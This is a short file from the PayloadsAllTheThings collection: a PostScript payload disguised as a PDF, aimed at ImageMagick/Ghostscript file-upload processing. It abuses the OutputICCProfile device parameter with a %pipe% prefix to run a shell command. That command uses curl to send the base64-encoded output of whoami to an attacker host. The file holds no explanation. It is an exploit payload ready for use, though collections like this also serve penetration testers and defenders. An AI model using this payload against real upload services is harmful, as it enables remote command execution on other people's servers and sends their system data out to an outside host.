PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf
2019-11-11 20:31:07 +01:00

4 lines
130 B
Plaintext

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit